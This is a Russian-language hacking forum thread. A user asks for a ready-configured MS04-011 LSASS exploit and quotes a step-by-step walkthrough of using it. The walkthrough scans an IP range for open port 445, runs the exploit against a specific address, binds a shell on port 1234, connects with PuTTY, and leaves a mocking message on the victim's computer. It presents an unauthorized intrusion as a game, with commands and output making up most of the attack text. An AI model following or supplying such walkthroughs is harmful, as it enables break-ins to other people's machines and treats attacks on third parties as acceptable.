Форум о защите от: хакеров, взлом, раскрутка, хакер, вирусы, взлом программы, взлом паролей, взлом вконтакте, взлом icq, раскрутка сайта, взлом скачать, взлом почты, взлом ru, проги взлома, хакер, программа взлома, трояны, программирование http://forum.ahack.ru/ |
|
Уязвимость XP хороший эксплойт http://forum.ahack.ru/topic1366.html |
Страница 1 из 1 |
Автор: | BECHED [ 10-12, 20:11 ] |
Заголовок сообщения: | Уязвимость XP хороший эксплойт |
Очень интересная статья про использование эксплойта автор все описал в подробности но !!!!!!! не написал как у него сделан эксплойт !!!!!!! Вопрос может кто нить и настроить исходник так что бы он открывал порт 1234 когда когда отакуешь через 445 порт а то я где то скачал но не на сайте securitylab.ru файл ms04011lsass.rar он только открывает 445 когда порт уже открыт вообщем пишет так !!!!!!! пишу expl.exe to xxx.xxx.xxx.xxx и порт 1234 в строке выдаеться типа дело в том что я не умею компилировать файлы (((((( [*]Connecting to 213.247.202.182 445…ok! а у автора статьи выдает порт 1234 вот в чем гвоздь [*]Attacking…ok! Прочитайте статью и помогите чем можно напешите на почту hack99999@rambler.ru или на форуме плиз если есть настроенный эксплойт дайте ссылку плиз !!!!! за ранее спасибо yhamobi ссылка на эксплойт есть в статье там исходник !!!!!!!!! А вот и сама статья Автор:gemagla.b1n Цель эксплоита: Remote DoS, Remote System Воздействие эксплоита: Windows 2000 sp4, Windows XP sp1 Автор эксплоита: houseofdabus Описание уязвимости: http://www.securitylab.ru/44490.html Скачать эксплоит: http://www.securitylab.ru/_Exploits/200 ... 1lsass.rar В этой статье я буду на реальном примере возводить эксплоит и опишу основные моменты использования уязвимости. Lets begin. Для начала нам нужно слить эксплоит.сливаем….в моем случае я закачивал сорсы(исходники) и откомпилировал. Также понадобится любой сканер,я буду использовать ][Spider 6.5.Для меня он является самм лучшим и надежным. Также обяателен любой telnet-клиент,я воспользовался SecureCRT. Target. Вот тут нам понадобится сканер Х-spider.С помощью его надо найти цель.Как известно,на машине должен быть открыт 445 порт.Этим и надо воспользоваться.Я пользовался Х-spiderом.Он легкий,не требователен к ресурсам,имеет удобный интерфейс,да еще и бесплатно….=) Надо найти цеь..В меню Х-spiderа выбираем Поиск и указываем диапазон IP-адрессом и ставим условие на открытый 445 порт. Вот что показад мне сканер: - 213.247.202.177 - 213.247.202.178 - 213.247.202.179 - 213.247.202.180 - 213.247.202.181 + 213.247.202.182 - 213.247.202.183 Видите +?Значит это машина с открытым 445 портом!Цель найдена.Это был только первый шаг. Lets attack! После того,как цель найдена,приступаем к возведению сплоита.Вот как это надо 10делать… Для начала определим удаленную ОС.Делаем это так… Запускаем коммандную строку и задаем путь к сплоиту.. C:expl.exe Смотрим на поле Targets.0-ОС ХР. Если мы зададим параметр –t,то можно определить удаленную ОС C:expl.exe 0 213.247.202.182 1234-t Результат: Target:IP: 213.247.202.182: OS:WinXP Professional [universal] lsass.exe [*] connecting to 213.247.202.182 …OK [*] Detecting remote OS:Windows 5.1 Смотрим вверх….5.1…. Detect remote OS: Windows 5.1-WinXp Ось мы определили …..ХР! Далее прсто пишем C:expl.exe 0 213.247.202.182 1234 (без префикса –t) [*]Connecting to 213.247.202.182 1234…ok! [*]Attacking…ok! Вот мы и соверили атаку на машину.. Теперь биндим там порт(я выбрал 1234,как вы видите) Опять пишем: C:expl.exe 0 213.247.202.182 1234 Повторяется все тоже самое,но теперь я забиндил 1234 порт на компе цели. Теперь коннектимся… Я запускаю PuTTy и на вкладке Session указыва АйПи машины,порт(1234) и коннектюсь по протоколу Raw. Конектимся…и мы уже в машине …Задача выполнена…но!Не зря же мы старались..Надо немнофка пофалить! Я оставлюя командой echo привет на компе! C:>echo прива!Ламер ушастый!gemagla.b1n and Bcteam have you >hello.txt(оставляю послание в файле hello.txt) Вот и все!Я вскрыл машины,оставил сообщение =) Что я могу сказать по этому поводу?Во-первых эксплоит ,приминенный мною,основан на RPC dcom.Бага еще до сих пор актуальна… http://www.microsoft.com/technet/securi ... 4-011.mspx -патч. В этот раз мне повезло…атака прошла успешно!Но мог бы быть и такой вариант: Причин этому может быть несколько: - помешал запущенный Firewall; - объект атаки оказался пропатчен; - не подошла версия операционной системы; - компьютер жертвы вышел из сети gemagla |
Автор: | CrazYVeNik [ 13-02, 05:21 ] |
Заголовок сообщения: | |
sp1 уже ни у кого нету =( а темка тру была ) |
Страница 1 из 1 | Часовой пояс: UTC + 3 часа |
Powered by phpBB® Forum Software © phpBB Group http://www.phpbb.com/ |